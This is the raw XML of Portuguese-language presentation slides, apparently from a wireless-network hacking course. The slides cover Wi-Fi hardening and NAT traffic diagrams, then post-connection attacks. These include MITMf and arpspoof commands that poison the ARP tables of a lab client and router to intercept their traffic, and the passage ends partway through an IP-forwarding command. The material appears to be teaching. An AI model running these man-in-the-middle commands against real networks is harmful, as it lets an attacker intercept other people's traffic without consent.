              <a:rPr lang="en-US" dirty="0"/>
              <a:t> que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aprendemos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>afim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alterar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> o 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proteção</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de rede</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Definir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>encripta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>ção</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> WPA ou WPA2, ou até mesmo WPA com WPA2 mixado, incluindo as encriptações TKIP com AES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Definir uma senha forte: pelo menos 12 caracteres, com maiúsculas, minúsculas, números e símbolos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202807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33448"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Invasão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a redes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fio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (wireless)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1266942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3E137-C9E5-4519-84D9-86D09496F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Ataques de pós-conexão à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511148-3C46-4BC0-8441-38B5C867C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264" y="1603684"/>
            <a:ext cx="4133295" cy="553591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endParaRPr lang="pt-BR" dirty="0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50F1DE0A-44DC-4208-B31F-AD7FD4CB9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5856" y="2578394"/>
            <a:ext cx="1523336" cy="2437338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100161F4-7640-4103-BCBF-8DEF2D6B3D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083" y="2496128"/>
            <a:ext cx="1423789" cy="2500312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 8" descr="Laptop free icon">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8A690D-AAD0-45C6-87D1-5B516F1B9B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6" name="Picture 12" descr="Router - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59292792-DA38-4C2D-896D-7D37D3C21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643" y="2536203"/>
            <a:ext cx="1719262" cy="1719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322DD11E-C430-407B-83B2-AF7F4173CA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876380" y="3517684"/>
            <a:ext cx="1411227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id="{3FF0DF5F-24ED-4723-B954-CC87571401A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7674851" y="3341758"/>
            <a:ext cx="1411227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82DB15B-4598-44CC-83D1-DEBFE2EB28DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659117" y="5230777"/>
            <a:ext cx="1411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IP: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"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1724E8DF-567A-4077-94CB-922164369A67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890333" y="4369401"/>
            <a:ext cx="2558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IP interno: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>público</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 192.168.53.2</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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6BC11FA0-6818-4092-993A-57F3898C9DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10037248" y="2093360"/>
            <a:ext cx="1814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IP: 203.76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.12.3</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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011EDE39-2041-4BDD-9865-B82003B1D639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2774661" y="2859859"/>
            <a:ext cx="1649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De: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.0.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Para: 10.0.0.1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5BD0C250-1FFB-4017-8FC1-CD3321150C15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7482327" y="2695427"/>
            <a:ext cx="2090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De: 192.168</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.53.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Para: 203.76.12.3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Seta: para a Direita 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65959A69-E613-4812-9E49-17A548569741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7674851" y="3896084"/>
            <a:ext cx="1411227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592E0523-13FF-4894-ACB5-7ECD52179206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618941" y="4216689"/>
            <a:ext cx="2090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De: 203.76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.12.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Para: 192.168.53.2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E25D05C4-1C17-4A72-85A8-075DC053D4D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797425" y="4255649"/>
            <a:ext cx="1649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De: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Para: 10.0.0.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Seta: para a Direita 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7DFDBA-C4EA-47BC-B4E1-D856B2CFCA03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2869150" y="3886666"/>
            <a:ext cx="1411227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37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22" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="26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3E137-C9E5-4519-84D9-86D09496F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Ataques de pós-conexão à rede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511148-3C46-4BC0-8441-38B5C867C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264" y="1603684"/>
            <a:ext cx="4133295" cy="553591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endParaRPr lang="pt-BR" dirty="0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50F1DE0A-44DC-4208-B31F-AD7FD4CB9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066" y="2796669"/>
            <a:ext cx="1086958" cy="1739132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100161F4-7640-4103-BCBF-8DEF2D6B3D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341" y="2566640"/>
            <a:ext cx="1258641" cy="2210296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 8" descr="Laptop free icon">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8A690D-AAD0-45C6-87D1-5B516F1B9B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6" name="Picture 12" descr="Router - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59292792-DA38-4C2D-896D-7D37D3C21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320" y="2474882"/>
            <a:ext cx="1719262" cy="1719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id="{3FF0DF5F-24ED-4723-B954-CC87571401A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8702643" y="3237070"/>
            <a:ext cx="1353739" cy="195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82DB15B-4598-44CC-83D1-DEBFE2EB28DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270709" y="4838737"/>
            <a:ext cx="1411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IP: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"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1724E8DF-567A-4077-94CB-922164369A67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5952088" y="4164760"/>
            <a:ext cx="2558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IP interno: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>público</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 192.168.53.2</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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6BC11FA0-6818-4092-993A-57F3898C9DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10447599" y="4699185"/>
            <a:ext cx="14736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IP: 203.76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.12.3</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600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011EDE39-2041-4BDD-9865-B82003B1D639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638816" y="3011982"/>
            <a:ext cx="164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De: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.0.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>Para: 10.0.0.1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5BD0C250-1FFB-4017-8FC1-CD3321150C15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8510119" y="2633285"/>
            <a:ext cx="2004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De: 192.168</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.53.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>Para: 203.76.12.3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Seta: para a Direita 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65959A69-E613-4812-9E49-17A548569741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8702642" y="3791396"/>
            <a:ext cx="1353739" cy="195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592E0523-13FF-4894-ACB5-7ECD52179206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8646733" y="4154547"/>
            <a:ext cx="2004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De: 203.76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.12.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>Para: 192.168.53.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 4" descr="Hacker - Free computer icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2166D25-1C76-478E-869E-4222524B7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949" y="2893551"/>
            <a:ext cx="1681710" cy="1681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Seta: para a Direita 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68D09EFC-4198-4904-B33A-05601E539124}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1646113" y="3577197"/>
            <a:ext cx="1110705" cy="19680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: para a Direita 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B29455E-2874-460C-B520-819DBFD6B598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743095" y="3559287"/>
            <a:ext cx="1021580" cy="175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25ABC7B3-E0BD-44A7-96DB-C3824DF7109A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4656479" y="3011982"/>
            <a:ext cx="164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De: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.0.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>Para: 10.0.0.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Seta: para a Direita 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D70D1B2-4AF6-4189-B6C9-9941EC82B00F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4743095" y="3790708"/>
            <a:ext cx="1021580" cy="175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602F6A9D-9B79-49D9-9A3D-8D9F8A471984}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4642691" y="3935542"/>
            <a:ext cx="164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De: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>Para: 10.0.0.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Seta: para a Direita 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A86EFF-37E8-4C89-A02F-FE3307D01034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1681937" y="3865034"/>
            <a:ext cx="1021580" cy="175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FD21DC03-4E48-4771-A789-3166271E74B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581533" y="4009868"/>
            <a:ext cx="164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De: 10.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>Para: 10.0.0.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53161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/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="3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D8FF721-DD08-4591-ACF3-0D328C923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Ataques de pós-conexão à rede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2D51EB0-CA38-4861-A2E2-A237B1C5F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114" y="1508434"/>
            <a:ext cx="4133295" cy="553591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FF9262E-93D9-4906-A397-2622789E8C0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="2434024"/>
            <a:ext cx="7343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MITMF – Man in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>middle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> framework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Ferramenta antiga que está obsoleta hoje em dia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D37AC41-8D73-4993-8627-C8B64E36D1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="3592979"/>
            <a:ext cx="8540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err="1"/>
              <a:t>Bettercap</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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Projeto com suporte e que está sendo mantido e atualizado</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27952360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E17E755-6AF3-4802-B181-337D1628F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Ataques de pós-conexão à rede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CEBE44DB-8970-4D8B-87EA-55B40024C066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994114" y="1508434"/>
            <a:ext cx="4865148" cy="55359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 err="1"/>
              <a:t>MITMf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> Framework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722FE60-879C-4804-A745-132776743C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118587" y="2259315"/>
            <a:ext cx="5850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Clone o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>projeto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pasta que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>desejar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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git clone https://github.com/byt3bl33d3r/MITMf.git </a:t>
            </a:r>
          </a:p>
          <a:p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9275A5D-42AF-45C4-A754-EC6D376DB23A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118587" y="3205335"/>
            <a:ext cx="6613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Instru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>ções</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> de como instalar: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>https://github.com/byt3bl33d3r/MITMf/wiki/Installation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2CC1A3A-2D5D-4874-A180-7BD5A72A40B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207363" y="4225771"/>
            <a:ext cx="10795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Dentro da pasta do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>MITMf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> use o comando: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python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> mitmf.py -i eth0 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> --gateway 10.0.0.1 --target 10.0.0.2  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11184371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E17E755-6AF3-4802-B181-337D1628F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Ataques de pós-conexão à rede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CEBE44DB-8970-4D8B-87EA-55B40024C066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="55359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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Interceptando dados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3553032-43A0-4B23-8549-9A53D170EBC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994114" y="2222355"/>
            <a:ext cx="5362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Avisando o cliente/usuário que somos o roteador </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> baseados no exemplo da apresentação):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arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -i eth0 -t 10.0.0.2 10.0.0.1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103E367-15FB-49EE-8E28-656AFA2AFCD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994114" y="3306016"/>
            <a:ext cx="5362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Avisando o roteador que somos o cliente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> baseados no exemplo da apresentação):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arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -i eth0 -t 10.0.0.1 10.0.0.2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31605A7-6552-43C1-AF7C-FD32E25999DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994114" y="4639300"/>
            <a:ext cx="5362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Para evitar a perda de conexão da máquina do usuário é necessário digitar no terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>kali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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> 1 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
